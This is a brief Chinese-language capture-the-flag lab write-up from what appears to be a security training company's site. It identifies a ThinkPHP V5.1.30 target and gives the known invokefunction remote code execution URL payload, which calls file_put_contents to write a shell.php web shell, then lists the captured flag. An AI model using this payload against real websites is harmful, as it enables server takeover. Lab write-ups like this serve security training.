1.访问靶场
2.测试发现该系统采用ThinkPHP V5.1.30框架
3.上家伙拿下:
/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=
4.得到flag:flag-{bmh00aca449-0ffa-47cc-b050-1fa7760bdd59}
(微信公众号) (网慕安微博)
Copyright © WarmSec 2024 网慕安(成都)科技有限公司 蜀ICP备2024063154号-2
热线:400-630-5665 邮箱:public@warmsec.com
公司地址:成都市高新区益州大道中段722号复城国际4栋13楼1309号